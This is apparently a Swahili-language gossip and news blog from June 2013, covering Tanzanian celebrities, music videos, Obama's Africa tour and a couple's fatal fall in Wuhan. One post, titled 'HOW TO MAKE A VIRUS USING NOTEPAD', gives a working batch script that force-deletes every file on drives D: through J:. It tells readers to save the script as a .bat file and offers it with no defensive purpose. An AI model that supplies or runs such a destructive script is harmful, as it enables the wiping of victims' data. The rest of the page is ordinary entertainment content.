Sunday, 30 June 2013

Hawa ndo WAPENZI WALIODONDOKA NA KUFA WAKATI WAKIFANYA MAPENZI DIRISHANI

 
Wapelelezi wakifunika miili ya wapenzi hao eneo la tukio.
Wapenzi wameanguka na kufa baada ya dirisha walipokuwa wakifanyia mapenzi kufunguka ghafla nchini China.

Wawili hao wanasemekana kudondoka kutoka kwenye dirisha la jengo moja la makazi kwenye jiji la Wuhan nchini humo pale

dirisha hilo walilokuwa wameegemea kufunguka.
Mashuhuda walivieleza vyombo vya habari vya China kwamba wapenzi hao walikumbatiana wakati wakianguka kwenye njia ya waenda kwa miguu nje.
Kwa mujibu wa The Sun, chanzo kimoja cha habari kilisema: "Huku wawili hao wakiwa wameshikamana vilivyo, walianguka nje ya jengo hilo."
Picha za kuogofya zimefichuliwa kwenye tovuti za nchini humo zikionesha wapenzi hao wakiwa wamefunikwa kwa mashuka na polisi.
Damu ilitapakaa kwenye njia ya waenda kwa miguu karibu na wapelelezi wanaonekana wakichunguza eneo la tukio.
Miili ya wapenzi hao ilipigwa picha karibu na baiskeli ambayo ilikuwa imelazwa chini, lakini hakukuwa na ripoti zozote kwamba yeyote chini alikuwa amejeruhiwa katika ajali hiyo.
Ripoti zinasema kwamba madirisha hayo kwenye jengo hilo la makazi yalikuwa hayana ubora unaotakiwa.
Inafikiriwa kwamba mwanaume huyo na mwanamke wanawezekana walikuwa wakijaribu kujipooza kando ya dirisha hilo ndipo tukio hilo likatokea.
Haikufahamika ni umbali gani kutoka juu wawili hao walikuwa wakati wakianguka.
Wuhan ni jiji maarufu zaidi lililopo katikati ya China.
Ukiwa na historia ya miaka 3,500 ni moja kati ya miji mikongwe na iliyostaarabika katika China.

HUYU NDIYE RAISI MPYA WA ST JOSEPH UNIVERSITY IN TANZANIA(MH: CHRISPINUS CHRISTIAN)

Huyu ndio RAISI mpya wa ST JOSEPH UNIVERSITY(2013-14) MH:CHRISPINUS CHRISTIAN
Kiongozi huyu aliyechaguliwa kwa kishindo kikubwa kwa kumzunguka mara nne kwa idadi ya kura mpinzani wake,ameonekana kupendwa sana na wananchi kutokana na umakini wa sera zake na slogan zake kama THROUGH "COPERATION,RESPECT,DISCPLINE AND PATIENCE" TOGETHER WILL  DELIVER ,na upiganaji katika haki ya mnyonge pale alipoweza pigana na kuhakikisha watu zaidi ya 300 waliokosa mikopo kwa mwaka wa kwanza (2011/12) wa masomo kuweza kupata mikopo yao.

CONGRATULATION MR PRESIDENT...................

RAISI WA ST JOSEPH KATIKA POZI...... TOFAUTI


RAISI WA ST JOSEPH KATIKA POZI......

"
NAKUTAKIA MAFANIKIO MEMA KATIKA UTENDAJI WAKO WA KAZI.
KATIKA KULETA MABADILIKO MAPYA ST JOSEPH''

Saturday, 29 June 2013

NEW SONG (J RAYS FT RAPPER:Mapara Safi Zoa zoa) (Offical HD video )

HOW TO MAKE A VIRUS USING NOTEPAD

 OPEN NOTEPAD AND COPY THE FOLLOWING CODE.....
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus

MAMIA NCHINI AFRIKA KUSINI WAJITOKEZA KATIKA MAANDAMANO YA AMANI YA KUPINGA KUJA KWA RAISI OBAMA


 
Waandamaji wa Nchini Afrika Kusini wakiwa wanasali mbele ya Ubalozi wa Marekani wakati wa maandamano ya kupinga kuja kwa Raisi Obama Nchini Humo jana  wakati Raisi Obama alipotua Nchini Humo Kwa Ziara ya Siku 2 .

VIDEO Roho ya Chuma Rapper ft J Rays

NEW VIDEO J RAYS FT RAPPER-penzi tatu.

Friday, 28 June 2013

RABBIT - SWAHILI SHAKESPEARE (OFFICIAL VIDEO)

TAZAMA MIJI KUMI MIKUBWA(Top 10 Biggest Cities In The World!)

NEW VIDEOZ D'banj - Don't Tell Me Nonsense (OFFICIAL VIDEO)

Angalia Picha kutoka Instagram huu ndio muonekano mpya wa Linah na Agness Masogange

Angalia PICHA MBALI MBALI YA KILICHOJIRI HUKO SENEGAL KATIKA MAPOKEZI YA OBAMA


obama-senegal

BIBI yake OBAMA MAMA SARAH OBAMA KUJA TANZANIA KUMSALIMIA MJUKUU WAKE ATAKAPOWASILI DARESALAM.

 
SIKU CHACHE KABLA YA ZIARA YA RAIS WA MAREKANI KUJA NCHINI TANZANIA IMEFAHAMIKA KUWA BIBI YAKE NA RAIS OBAMA MAMA SARAH OBAMA ANATARAJIA KUJA NCHINI TANZANIA KUJA KUMSALIMIA MJUKUU WAKE HUYO.

WEMA SEPETU AFUNGULIWA MASHITAKA


MMILIKI wa Kampuni ya Filamu ya Endless Fame, Wema Sepetu hivi karibuni amejikuta kwenye wakati mgumu baada ya majirani zake kumshitaki kwenye serikali ya mtaa kufuatia tabia ya wafanyakazi wake kutiririsha maji machafu mtaani.

Taarifa iliyolifikia inadai kuwa, majirani wa Wema katika eneo analoishi, Kijitonyama jijini Dar wamekuwa wakimlalamikia msanii huyo kwa kitendo hicho lakini imeonekana uvumilivu umewashinda.

“Mara kwa mara wafanyakazi wake wamekuwa wakitiririsha maji hapa mtaani sasa leo tumeona tukamshitaki serikali za mitaa ili sheria ichukue mkondo wake,” alisema mmoja wa majirani wa staa huyo aliyeomba jina lake lisiandikwe .

Juni 26, mwaka huu Ijumaa lilifika kwenye nyumbani kwa Wema na kushuhudia maji yakitoka kisha kuzagaa mtaani na muda mfupi baadaye alifika Afisa Mtendaji wa Kata ya Makumbusho (jina halikufahamika mara moja) ambaye aligonga kwenye nyumba ya Wema, baada ya muda alitoka binti wa kazi aitwaye Bite.

Katika mazungumzo yao, Bite alionekana kujitetea lakini baadaye ilibainika wana makosa na akatakiwa kwenda ofisi za kata kwa maelezo zaidi.

Amri hiyo ilionekana kuwa ngumu kwa Bite na wafanyakazi wenzake ambapo busara zilitumika na kiongozi huyo wa serikali akataka walipe faini na kuwaonya waache tabia hiyo.

Kufuatia hatua hiyo, Bite aliingia ndani (inadaiwa alikwenda kumtonya Wema) ndipo alipotoka akiwa na fedha ambazo Ijumaa halikujua ni kiasi gani, wakasainishana kisha mchezo ukaishia hapo.

Jitihada za kumpata Wema kuzungumzia sakata hilo ziligonga mwamba kutokana na msanii huyo kutopokea simu na hata mwandishi alipofika nyumbani kwake aliambiwa hayupo.


NEY WA MITEGO AANZISHA BIFU NA PANCHO, USHOGA WAHUSISHWA ....jionee mwenyewe mtu wangu wa ukweli.....

Thursday, 27 June 2013

TAZAMA HAPA VIDEO ZA MAJENGO KUMI MAKUBWA DUNIANI.(Top 10 Tallest Buildings In The World 2013)

VIDEO MPYA YA MSANII TOKA UGANDA DR JOSE CHAMELEONE: BADILISHA (OFFICIAL HD VIDEO).mp4

DIAMOND PLATNUMS KUPERFORM JUKWAA MOJA NA WAKALI WA NIGERIA NCHINI KENYA MWEZI UJAO

 

Ni ukweli ulio wazi kuwa star wa ‘Kesho’ Diamond Platnumz ‘anaweza’ kuwa msanii wa Tanzania anayefanya show nyingi zaidi kwa sasa na za gharama kubwa, baada ya kuwachanganya mashabiki wa Comoro na crew yake ya Wasafi weekend iliyopita sasa anategemewa kushare jukwaa moja na wakali kutoka Nigeria Davido na Ice Prince jijini Nairobi mwezi July.
Diamond Platnumz kipenzi cha mabinti ataungana na star wa Nigeria hit maker wa ‘Dami Duro’ Davido, Ice Prince, Victoria Kimani wa Kenya, na wakali wengine katika ‘Boombaataa Festival’.

Mtandao wa Ghafla umethibitisha ushiriki wa Diamond katika show hiyo kubwa ambayo hufanyika mara moja kwa mwaka nchini Kenya, yenye lengo la kuleta burudani ya utofauti kwa wanamuziki wa Afrika, fashion pamoja na utamaduni.

Show hiyo inategemewa kufanyika (July 27) mwaka huu Nairobi, Kenya.

WIMBO MPYA WA Justin Timberlake - Mirrors

WIMBO MPYA WA Ben Pol - JIKUBALI (Official Music Video)

♪ SIKILIZA WIMBO MPYA WA AUDIO WA LADY JAYDEE - YAHAYA

VIDEO MPYA YA MWANADADA Vanessa Mdee- Closer

LADY JAY DEE 13 ANNIVERSARY IN MUSIC LIVE SHOW @ NYUMBANI LOUNGE - MICHU...

Wednesday, 26 June 2013

UJIO WA OBAMA:TAYARI MAOFISA WA ULINZI WA MAREKANI WAKO NCHINI






Mkurugenzi wa Uwanja wa Ndege wa Kimataifa wa
 Julius Nyerere, Moses Malaki alisema jana kwamba ratiba za uwanjani
 hapo zitabadilika kutokana na uzito wa ugeni huo.
Alisema kwa kawaida anapokuja kiongozi mkubwa wa
 kitaifa katika uwanja huo hakuna ndege inayoruhusiwa kutua kwa kipindi cha nusu saa.
“Ni kweli hali hiyo pia itakuwapo
 atakapokuja Rais Obama na safari
 za ndege zitabadilika kulingana na ratiba ya kutua na kuondoka kwa
 Rais huyo,”

WIMBO MPYA WA Nonini-Kwama Nao (Official Video)

QUEEN DARLEEN: KWENYE MAPENZI UBABE NAUWEKA PEMBENI



STAA wa muziki wa Bongo Fleva, Mwanahawa Abdul ‘Queen Darleen’ amesema pamoja na ubabe wake lakini linapofika suala la mapenzi anauweka pembeni.
Akizungumza na mwandishi wa habari hizi, Darleen alisema kwamba wanaume wamekuwa wakimchukulia tofauti kutokana na ubabe wake huo kwa kudhani kwamba siyo mtu wa kujali.
“Tofauti na jinsi nilivyo, mimi siko hivyo kabisa katika mambo ya mapenzi mambo ya ubabe hayana nafasi kabisa kwangu,” alisema Darleen.

WIMBO MPYA: P Square Personally (official video) :Utazame hapa mtu wangu wa nguvu..

Hii ndo KAULI ya KAJALA BAADA YA KUSADIKIKA KUNA BIFU BAINA YAKE NA WEMA SEPETU






“Unajua mi nashangaa sana watu wanatoa wapi maneno wanayoandika, mimi sina tatizo na Wema, wala siwezi kuwa na tatizo naye, wema amekuwa msaada mkubwa kwangu, sa sijui nitagombana nini na wema, huo ni uzushi tuu jamani, muwe mnatuuliza kabla ya kuandika” Alisema kajala
Alipoulizwa kuhusu ukaribu wake mpya na wolper alisema
“Wolper nimekutana naye kwenye party ndo tukaamua kupiga picha, au siku hizi sitakiwi kupiga picha na mtu mwingine zaidi ya wema? Wolper ni rafiki yangu”

MIAKA 13 YA KIKOS CHA MIZINGA NDAN YA CLUB BILICANAS JUMAPILI HII. HAPPY BIRTHDAY KIKOSI CHA MIZINGA, USIKOSE NJOO TUKATE KEKI NA TULE PAMOJA



 

MIAKA 13 YA KIKOS CHA MIZINGA NDAN YA CLUB BILICANAS JUMAPILI HII.
HAPPY BIRTHDAY KIKOSI CHA MIZINGA,
USIKOSE NJOO TUKATE KEKI NA TULE PAMOJA

Tuesday, 25 June 2013

Mtangazaji maarufu wa kipindi cha michezo ITV na Radio One, Maulid Kitenge ametangaza kugombea ubunge jimbo la Ubungo kwa tiketi ya CCM.

 

Mtangazaji maarufu wa kipindi cha michezo na taarifa ya habari ITV na Radio One, Kitenge Maulid Kitenge kwa kupitia mtandao wa Instagram na Twitter ametangaza kugombea
ubunge jimbo la Ubungo kwa tiketi ya CCM.
Kitenge anakuwa miongoni mwa watu maarufu na wasanii waliotangaza nia hiyo kama Soggy Dogg Hunter (CHADEMA, Segerea) na Afande Sele (CHADEMA, Morogoro).

Aidha, kuna tetesi kuwa huenda wasanii MwanaFA (CCM) na Prof Jay (CHADEMA) wakatangaza nia bila kumsahau msanii wa Bongo movie Ray Kigosi.